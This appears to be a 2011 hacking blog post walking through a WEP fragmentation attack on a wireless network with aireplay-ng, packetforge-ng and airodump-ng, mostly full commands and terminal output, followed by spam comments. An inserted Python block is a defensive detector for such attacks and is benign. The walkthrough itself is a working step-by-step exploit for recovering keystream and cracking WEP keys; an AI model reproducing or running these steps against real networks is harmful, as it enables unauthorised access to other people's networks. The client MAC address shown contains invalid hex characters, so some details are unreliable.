fragmentation attack with aireplay-ng

Basically, the program obtains a small amount of keying material from a captured packet,
then attempts to send ARP and/or LLC packets with known content to the access point.
If the packet is successfully echoed back by the access point, a larger amount
of keying information (keystream) can be obtained from the returned packet.
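The echo-and-relay behaviour described above has a visible footprint on the air: a burst of tiny, protected, fragmented data frames sent by one station toward the AP. The following detector is an added example written for this post (not part of aireplay-ng or the original article); the frames, MAC addresses and the 12-byte fragment body size are constructed test input, and the thresholds are assumptions to tune per network.

```python
import struct
from collections import defaultdict

# Frame Control flag bits (second byte of the 802.11 Frame Control field)
TO_DS, FROM_DS, MORE_FRAG, PROTECTED = 0x01, 0x02, 0x04, 0x40

def parse_data_frame(frame):
    """Return header fields of a 3-address 802.11 data frame, or None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:   # type 2 = data
        return None
    hdr_len = 26 if frame[0] & 0x80 else 24            # QoS subtypes add 2 bytes
    if len(frame) < hdr_len:
        return None
    flags = frame[1]
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]  # frag in low 4 bits
    return {
        "to_ds": bool(flags & TO_DS), "more_frag": bool(flags & MORE_FRAG),
        "protected": bool(flags & PROTECTED),
        "addr2": frame[10:16].hex(":"),                 # transmitter address
        "frag_num": seq_ctrl & 0x0F, "seq_num": seq_ctrl >> 4,
        "body_len": len(frame) - hdr_len,
    }

def detect_fragmentation_attack(frames, min_fragments=8, max_body=16):
    """Flag stations sending many tiny protected fragments toward the AP.
    Normal clients almost never fragment, and never into a few bytes."""
    counts = defaultdict(int)
    for raw in frames:
        h = parse_data_frame(raw)
        if (h and h["to_ds"] and h["protected"] and h["body_len"] <= max_body
                and (h["more_frag"] or h["frag_num"] > 0)):
            counts[h["addr2"]] += 1
    return sorted(sta for sta, n in counts.items() if n >= min_fragments)

def build_frame(flags, addr1, addr2, addr3, seq, frag, body):
    """Assemble a raw 3-address data frame (constructed input, not a capture)."""
    return (bytes([0x08, flags, 0, 0]) + addr1 + addr2 + addr3
            + struct.pack("<H", (seq << 4) | frag) + body)

# Constructed addresses from the documentation MAC range; not real devices.
AP, ATTACKER, CLIENT = (bytes.fromhex(h) for h in
                        ("00005e005301", "00005e0053aa", "00005e0053bb"))
BCAST = b"\xff" * 6
SAMPLE_FRAMES = [
    # 16 fragments, 12-byte body each (assumed IV+4 data+ICV), from one station
    build_frame(TO_DS | PROTECTED | (MORE_FRAG if i < 15 else 0),
                AP, ATTACKER, BCAST, 100, i, b"\x00" * 12) for i in range(16)
] + [
    build_frame(TO_DS | PROTECTED, AP, CLIENT, BCAST, 7, 0, b"\x00" * 60),    # client
    build_frame(FROM_DS | PROTECTED, BCAST, AP, CLIENT, 8, 0, b"\x00" * 60),  # AP relay
]
```

On a live WEP network the same rule can be fed from a monitor-mode capture; the real fix is to retire WEP for WPA2/WPA3, since keystream recovery is inherent to the protocol.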


scenario

ESSID : wireless
BSSID : 00:02:6F:23:2B:67
CLIENT MAC : 00:02:4G:87:22:FG


[o] you need to authenticate with the access point.

root@evilc0de:/home/noge# aireplay-ng -1 6000 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:58:55 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10

09:58:55 Sending Authentication Request (Open System)
09:58:55 Authentication successful
09:58:55 Sending Association Request
09:58:55 Association successful :-) (AID: 1)

09:59:10 Sending keep-alive packet
09:59:25 Sending keep-alive packet
09:59:40 Sending keep-alive packet


[o] run standard ARP request replay

root@evilc0de:/home/noge# aireplay-ng -3 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
08:07:58 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
Saving ARP requests in replay_arp-0706-080758.cap
You should also start airodump-ng to capture replies.
728 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

As you can see, I got 0 ARP requests.


[o] fragmentation attack!

root@evilc0de:/home/noge# aireplay-ng -5 -b 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG
09:59:00 Waiting for beacon frame (BSSID: 00:02:6F:23:2B:67) on channel 10
09:59:00 Waiting for a data packet...
Read 432 packets...

Size: 112, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0842 2c00 0002 6f87 11fe 0002 6f55 2bd2 .B,...o.....oU+.
0x0010: 000c 4252 2553 e05c 1398 2200 e7b4 f9fa ..BR%S.\..".....
0x0020: a786 d686 bfd1 8151 5bcf a8cb eac8 a10a .......Q[.......
0x0030: 52a9 49c5 ade4 de32 ef4b 294e c961 7de0 R.I....2.K)N.a}.
0x0040: 95ce afe7 ae32 225e 3af0 73db e7aa 47e4 .....2"^:.s...G.
0x0050: 6053 9a4c 0b8d 985b d9fe c1c3 dfc4 b82e `S.L...[........
0x0060: 82b4 a7f0 31bf 8fc6 dd01 4e77 1c02 0520 ....1.....Nw...

Use this packet ? y

Saving chosen packet in replay_src-0706-095931.cap
09:59:34 Data packet found!
09:59:34 Sending fragmented packet
09:59:34 Got RELAYED packet!!
09:59:34 Trying to get 384 bytes of a keystream
09:59:35 No answer, repeating...
09:59:35 Trying to get 384 bytes of a keystream
09:59:35 Trying a LLC NULL packet
09:59:37 No answer, repeating...
09:59:37 Trying to get 384 bytes of a keystream
09:59:39 No answer, repeating...
09:59:39 Trying to get 384 bytes of a keystream
09:59:39 Trying a LLC NULL packet
09:59:39 Got RELAYED packet!!
09:59:39 Trying to get 1500 bytes of a keystream
09:59:39 Got RELAYED packet!!
Saving keystream in fragment-0706-095939.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


[o] build your packet with packetforge-ng

root@evilc0de:/home/noge# packetforge-ng -0 -a 00:02:6F:23:2B:67 -h 00:02:4G:87:22:FG -k 255.255.255.255 -l 255.255.255.255 -y fragment-0706-095939.xor -w privx
Wrote packet to: privx

[o] use privx to capture ARP requests

root@evilc0de:/home/noge# aireplay-ng -2 -x 150 -r privx -h 00:02:4G:87:22:FG mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1D:8E:11:7B:0C) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:02:4G:87:22:FG


Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:02:6F:23:2B:67
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:02:4G:87:22:FG

0x0000: 0841 0201 0002 6f55 2bd2 0002 6f87 11fe .A....oU+...o...
0x0010: ffff ffff ffff 8001 3e98 2200 3a8c be0b ........>.".:...
0x0020: 0926 44f8 fe6a c35c d517 3ff1 2a8b 95df .&D..j.\..?.*...
0x0030: 97eb b45d bab9 b71b e777 edc7 8678 f1e7 ...].....w...x..
0x0040: d1b2 68b7 ..h.

Use this packet ? y

Saving chosen packet in replay_src-0706-100037.cap
You should also start airodump-ng to capture replies.

Sent 37888 packets...(150 pps)


[o] ARP requests start showing some results [check the standard ARP request replay]

422382 packets (got 103517 ARP requests and 239278 ACKs), sent 125781 packets...(478 pps)


[o] run airodump-ng to capture replies

root@evilc0de:/home/noge# airodump-ng -c 10 --bssid 00:02:6F:23:2B:67 -w wep mon0
CH 10 ][ Elapsed: 20 mins ][ 2011-07-06 10:19

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:02:6F:23:2B:67 -75 90 11337 100296 89 10 54 . WEP WEP OPN wireless

BSSID STATION PWR Rate Lost Packets Probes

00:02:6F:23:2B:67 00:02:4G:87:22:FG 0 36 - 1 1271 216477


[o] crack your .cap file to find the key!

Comments

zhie_o said…
turns out... eh... turns out... nogay is back again... hahaha
evilc0de said…
yeah, it's been a long time since I posted anything.. hehehe.. :))
I would like to thank you for the efforts you have put into writing this web site. I am hoping for the same high-grade web site posts from you in the future as well. Actually, your creative writing abilities have encouraged me to get my own site now. Really, blogging is spreading its wings quickly. Your write-up is a good example of it.
I really like your writing. Thanks so much, finally a decent website with good information in it.
I have been meaning to write something like this on my website and you have given me an idea. Cheers.